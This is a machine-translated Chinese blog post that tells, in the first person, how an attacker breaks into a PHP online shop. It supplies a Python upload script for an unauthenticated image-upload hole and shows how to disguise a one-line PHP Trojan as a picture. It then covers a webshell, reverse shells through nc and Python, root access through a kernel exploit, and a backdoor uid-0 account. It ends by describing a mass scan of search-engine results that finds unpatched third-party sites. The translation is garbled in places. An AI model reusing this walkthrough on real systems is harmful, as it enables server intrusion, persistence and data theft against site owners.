Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Time:2021-8-26

Recently, a friend set up a mall and wanted me to test it for him, so I had this article.
The official account is sent: AI boy, will get a push for AI learning gift package.

Background description

“A few days ago, a friend found me through QQ. He said he found my shared” vulnerability scanning software “through a Baidu cloud search software. He found me along the QQ on the software and wanted me to help test his mall. Originally, I refused, but when I think that others have specifically found me, I’d better test it for him and add a meal by the way (in order not to cause trouble to the user, I will code the URLs that appear in the article next) “

By reading this article, you will understand the whole process of intrusion: how to take advantage of the loopholes of the website, take the server permissions step by step, modify the server password, steal the database

About title

  • What is a server?
  • What’s the use of service?
  • What will hackers do if they invade the server?
What is a server?

The server, in popular terms, is a computer placed in the computer room. The difference from our ordinary computers is that the server has fixed IP, firewall, constant temperature and humidity, etc.

The role of the server is similar to that of the USB flash disk. They are used to store files, but the server stores the website files you do well, but it is not limited to the website, but also includes pictures, words, videos, databases, website programs, etc.

What’s the use of servers?

The server has a wide range of functions. Online games, websites and some software need to be stored in the server. Some enterprises will be equipped with servers. Important information about their work is stored in the hard disk of the server.

What will hackers do if they invade the server?
  • If you invade a server equipped with a community access control system, you can control the opening and closing of the community door or unit door at will;
  • If they invade the server equipped with monitoring and management system, they can operate the camera at will.
  • If they invade the server with the website program or database, they can steal the website source code, modify or steal the database data
  • ……

Here, we should understand the harm of server intrusion. If you want to know more about vulnerabilities, you can go to the dark cloud knowledge base to learn. There are more than 40000 valuable vulnerabilities, which are the painstaking efforts of the white hats. Address: http://www.anquan.us/

If you have any questions, you can confide, boy.

There is no trivial matter in the network, everything needs to be careful!

On security issues, the same answers were found in a well-known domestic search engine.

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

The result of a search

These materials basically tell you how to check, how to protect, and treat the symptoms rather than the root causes. You don’t know the bad guys’ bad methods, you don’t know the bad guys’ bad process, you are always in a state of mind after being bullied by the bad guys: panic!

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Pictures from the Internet

The story begins

Next, from the perspective of an “attacker”, I will use the first person to tell the whole test process through a story.

Hello, I’m the hero of the story: Xiao Hei. I received a security test list. The other party asked me to help test the security of the website. As far as I know, all the information about the website is as follows:

  • A mall
  • Written in PHP
  • Open source software
  • website

No…

Find open source web software vulnerabilities

First find out whether there are public vulnerabilities in the software on the website. If not, you can download the software for testing and carefully screen the problems in logic or coding.

Fortunately, I found this software in a security forum. Some time ago, a picture upload vulnerability was exposed: the causes of the vulnerability: 1. Permission verification was not done at the background picture upload interface; 2. The suffix of the uploaded picture is not verified to be JPG, JPEG, PNG and GIF. Consequences of the vulnerability: 1. Any user can upload pictures through the interface; 2. Script files disguised as pictures will be parsed after uploading. Solution: 1. Do permission verification; 2. Check the suffix of the uploaded picture file; 3. You can also store uploaded files on OSS.

It’s a good start to find a breakthrough so soon, ha ha.

Make picture horse

Since it is a picture upload vulnerability, then next, I need to disguise a picture horse to upload and test the customer’s website.

Warning: in order not to affect the tested website, all Trojan files used in this paper are empty files.

Windows system:

copy tp.jpg/b+yjh.php  tpyjh.jpg
/**
 *Tp.jpg: normal picture 
 *Yjh.php: one sentence Trojan horse
 *Tpyjh.php: a one sentence Trojan horse disguised as a picture is generated
 */

Linux system:

cat tp.jpg/b yjh.php > tpyjh.jpg
/**
 *Tp.jpg: normal picture 
 *Yjh.php: one sentence Trojan horse
 *Tpyjh.php: a one sentence Trojan horse disguised as a picture is generated
 */

Write upload scripts to test vulnerabilities

#!/usr/bin/python
# -*- coding: utf-8 -*-
# test_upload.py

import requests
import random

url_ Base = [root domain name of the website to be tested]

def requests_post(url, data, files):
    temp = None
    headers = get_header()
    try:
        temp = requests.post(url, data=data, files=files, headers=headers, timeout=5)
    except ValueError, e:
        return False
    return temp

def get_header():
    user_agent_list = [
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95',
        'Safari/537.36 OPR/26.0.1656.60',
        'Opera/8.0 (Windows NT 5.1; U; en)',
        'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 '
        '(maverick) Firefox/3.6.10',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
        'Chrome/39.0.2171.71 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 '
        '(KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
    ]
    UserAgent = random.choice(user_agent_list)
    header = {'User-Agent': UserAgent}
    return header


if __name__ == '__main__':
    data = {
        "file_path": "upload/common/"
    }
    files = {
        "file_upload": ("tpyjh.php", open("tpyjh.php", "rb"), "image/png")
    }
    url =  url_base + 'index.php?s=/admin/upload/uploadfile'
    res = requests_post(url, data, files)
    print res.status_code
    print res.text.decode('unicode_escape')

Upload test:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Upload succeeded and the Trojan path is returned: upload / common / 1565530537.php

Kitchen knife connection test, getshell!

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Tip: if you want to prevent someone from maliciously uploading Trojan files through upload vulnerabilities, please be sure to turn off the write and execution permissions of the upload directory!

Through the above operations, I found that the execution permission of this upload directory is not closed, so the write permission should be eight, nine and ten without too many restrictions, so I casually found a horse with high permission on the Internet and passed it on. The reason why it is spread to Malaysia is that generally speaking, ponies have relatively small operational permissions and are easy to be investigated and killed. If you upload a horse with high privacy (adding modifiers, confusion, splitting and other means can avoid the killing of feature codes), and the horse with large authority can be hidden in the server for a long time to facilitate the right lifting.

Tip: to check and kill Trojans on the server, only stupid Trojans can be checked and killed by relying on keywords or feature codes. If the attacker avoids killing, it is difficult to be found.

Upload free Malaysia

Upload to the server:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!
Malaysia entrance

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!
Malaysia management interface

Note: about Malaysia, please don’t use it at will. Of the 10 Malaysia published online, 10 have a back door! This is what people call black eating black! If you test your server with Malaysia downloaded from the Internet, it may be used by publishers in Malaysia, resulting in irreparable losses!

Rebound shell

Due to the lack of many permissions in Malaysia and the inconvenience of web page operation, it is necessary to rebound the shell to facilitate the operation of the target host through the command line.

For rebound operation, an external network machine is necessary. Even if it is not an external network, it can be mapped. If it is an Internet server, it is even simpler. Because Xiaohei has some idle test servers in his hands, he bounces the connection directly through the server for convenience.

Listening port:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

There are many execution modes for executing rebound commands. Different target hosts support different execution modes. After testing, I chose NC rebound: start rebound ~

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Rebound connection succeeded!

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Many people may feel that at this stage, they seem to have root permission and control the whole target host. However, it’s not that simple. Let’s see which user I am currently:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

In fact, you can guess it’s nginx or Apache without looking, because we connect through the web and write programs in PHP. Don’t believe it? See which directory we are currently connected to:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

The initial position is at the big horse. There is no problem with this. However, in the process of operation, I found that no matter how I switch the path, it seems to be in the current directory. This is too inconvenient!

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

So I changed the horse and bounced the shell through python.

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Connection succeeded! And tested the command line.

OK ~ it seems normal.

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

View system information

First view the shadow file and passwd file.

Tip: Xiaohei has a habit. If he can enter the root directory of the target host, Xiaohei will first look at the permissions of shadow file and passwd, and then carry out the next operation (it seems that he has insufficient permissions and slipped away).

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

View kernel version:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Linux 10-10-34-187 3.10.0-123.4.4.el7.x86_64 #1 SMP Fri Jul 25 05:07:12 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Read / proc / version to get the Linux kernel version:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Linux version 3.10.0-123.4.4.el7.x86_64 ([email protected]) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Fri Jul 25 05:07:12 UTC 2014

Check CentOS version:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Exp elevation permission

After checking, it is found that the kernel version of Linux is: Linux 3.10.0-123.4.4.el7.x86_ 64 CentOS

Therefore, we need to find an exp that supports this book. Introduction to exp: https://blog.csdn.net/zhao199…

After searching, a kernel exp is found, which can be used to raise rights to root users.

Tip: there are many kinds of weight lifting postures. Here, try the kernel weight lifting first. If it doesn’t work, change to another posture.

Upload the exp to the / TMP / directory of the target host:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Check:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Compile exp:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Embarrassing ~ wrong report:

gcc: error trying to exec 'cc1': execvp: No such file or directory
#There is no error for this file or directory

Input: whereis GCC
I found a GCC in / usr / bin / GCC
So I try to set the path in the past. The command is as follows:

Export path = / usr / bin: $path (reset according to your own location)

Continue compiling:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

40616.c: In function 'procselfmemThread':
40616.c:99:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
         lseek(f,map,SEEK_SET);
         ^
In file included from 40616.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
/tmp/ccacvdug.o: In function `main':
40616.c:(.text+0x39d): undefined reference to `pthread_create'
40616.c:(.text+0x3b8): undefined reference to `pthread_create'
40616.c:(.text+0x3d1): undefined reference to `pthread_create'
40616.c:(.text+0x3e5): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

Another error is reported. After opening the file and looking at it, it is found that the parameter pthread is missing. Continue compiling:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Some warnings during compilation can be ignored. As long as LS verifies that the compilation is successful:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Check our current ID. at present, my uid is 997 and belongs to ordinary users:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Execute exp:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

After exp is executed, it is found that the currently logged in user name has changed to root. Print the ID, and the uid is 0, which changes to super user. In other words, at this time, I already have the control authority of the whole server and can do whatever I want.

As an intruder, in order not to bring unnecessary impact to my next operation, the first thing to do next is to create a separate account for myself and upgrade it to root permission to facilitate my remote login. If I don’t create a separate account for myself, I can’t directly connect to the server remotely. I have to use the rebound shell to connect to the server every time, and I have to carry out the right lifting operation again every time I come in. This is too troublesome and easy to be found, resulting in the destruction of the whole right lifting result. Therefore, since it is to raise rights, what we need to do is to be as perfect as possible.

Add user

Now that I have obtained the root permission, my test is almost completed. I will demonstrate the next operation directly on my own server to avoid unnecessary trouble to the other party.

Create an account named test01 through the addUser [user name] command and set the initial password:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

VIM / etc / passwd open the passwd file and find the newly created test01:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Modify the uid (user ID) of test01 to 0. 0 means super user:

test01:x:1002:1002:,,,:/home/test01:/bin/bash
#Amend to read:
test01:x:0:1002:,,,:/home/test01:/bin/bash

Explain the / etc / passwd file:

test01:x:1002:1002:,,,:/home/test01:/bin/bash
#Field 1: user name
#Field 2: password flag
#Field 3: uid (user ID) (0: super user; 1 ~ 499: system user; 500 ~ 65535: ordinary users)
#Field 4: GID (user initial group ID)
#Field 5: user description
#Field 6: home directory (ordinary user): / home / user name; Super user: / root /)
#Field 7: shell after D login

#What is shell?
#1. Shell is the command interpreter of Linux
#2. In / etc / passwd, except that the standard shell is / bin / bash,
#It can also be written. For example, / SBIN / nologin indicates that you are not logged in. If you change the 7th field of the administrator to / SBIN / nologin,
#It means that the user is temporarily disabled.

Now that you have created an independent account and promoted to super user, log in and try to connect successfully:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Log in successfully, and you are a super user, ojbk ~

So far, the whole process of raising rights has been completed, and finally the super management right of the target server has been obtained.

However, if the purpose of the rights proponents is malicious and aggressive, now is the time for them to really start performing. They may modify data, steal data, destroy servers, etc. no one is sure of their real purpose.

for instance

If the real purpose of my intrusion into the server is to modify the data, then I need to find the location of the database next.

During the intrusion test, I already know that the other party uses the ngnix server environment. Therefore, I can find the configuration file of nginx, first understand how many web services are running on the next current server, find the one we need, and find its root directory:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Check the two files through the cat command. In most cases, one of them will configure the corresponding domain name and website path. But the actual situation is: the contents are the same, and they are all the default nginx.conf configuration. It is worth noting that there must be an article in the default server root path.

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Go to / home / wwwroot / default to see:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

I found the other party’s phpMyAdmin, retreated one level, and found the layout location of the website… Next, I can get the database connection address, database name, account number and password in the website program, so as to operate the database.

Next, I won’t demonstrate a series of operations such as modifying the database. If you are a novice who doesn’t know much about database operation, you can consult me. I wrote a script for database backup:

#!/bin/bash
# Name:bakmysql.sh

#Backupdir: database backup D address (to which location)
backupdir=/home/pigbak/mysqldata
#Time: timestamp to prevent the backup database from being overwritten
time=`date +%Y%m%d_%H%M%S `
#Database name: lucky
#Database account: root
#Database password: 123456

#Suppose we want to back up a database named luky
mysqldump -uroot -p123456 lucky | gzip > /home/databackup/mysqldata/lucky_$time.sql.gz

So far, this is the end of a brief but relatively complete intrusion demonstration (I won’t demonstrate a series of operations such as deleting logs. After all, my main purpose is to let you understand the security risks, not to teach you how to avoid tracking). You should know the means of attackers and know yourself and the enemy before you can win a hundred battles. I hope you can take corresponding precautions in some aspects. If you don’t understand the defense of a certain link, you can consult me.

supplement

After helping my friends finish the whole intrusion test, I found a very interesting thing. There are a lot of people using this open source software platform, and what’s chilling is that many of them may have been shot!!! Isn’t their server a lamb to be slaughtered??!!!

In order to test my idea, I want to find all companies (or individuals) using this open source mall in Baidu and find websites that have not been patched.

So I searched with a well-known domestic search engine:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

The result of a search

It almost scared me. There were 1, 400, 000 results…

Even if one in 1000 can be shot, the amount of data is not simple!

With such a huge amount of data, manual testing is certainly unreliable, so I wrote an automatic script in Python according to Baidu’s search results, automatically filtered out all websites unrelated to the open source software, and automatically tested and recorded vulnerabilities.

Create a new result folder and put three files in it:

  • Successful.txt: store the vulnerable website address and vulnerability path
  • Fail.txt: store the vulnerable website address, but the vulnerability has not been found yet
  • Scanner.py: vulnerability detection script

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Enter the result folder and run the script to start detection:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Finally, the program detected 13 pages (20 articles per page) and detected 8 websites whose vulnerabilities had not been repaired. Then I resolutely stopped the program and did not continue to detect, but fell into deep thinking

Page 13 test results

Websites that still have vulnerabilities:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Websites whose vulnerabilities have been fixed:

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

According to this conversion rate, after detecting all websites, the websites with vulnerabilities can easily break 1000. But think back carefully: in fact, any seemingly perfect program actually has bugs. Why are so many websites with vulnerabilities still running normally? If it had been put six years ago, I’m afraid many websites or servers have been disfigured by those script boys. In fact, just like thieves in our lives, with the improvement of living standards, it is not because everyone’s anti-theft technology has improved, but because everyone’s living standards have improved, thieves don’t have to do those unnecessary things. Now a practicing server costs less than a few money. There is no need to take risks to attack others.

Be open and aboveboard, work down-to-earth, and never violate the moral bottom line!

Well, today’s popularization of safety knowledge is over.

Supplementary notes

This article is only used to popularize network security knowledge, improve the security awareness of small partners, and introduce the characteristics of common vulnerabilities. If the reader makes any behavior endangering network security, he shall bear the consequences, which has nothing to do with the platform and the original author, it is hereby declared.

If you want to explore the mysteries of artificial intelligence with boys

Please long press the QR code below to follow me

Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!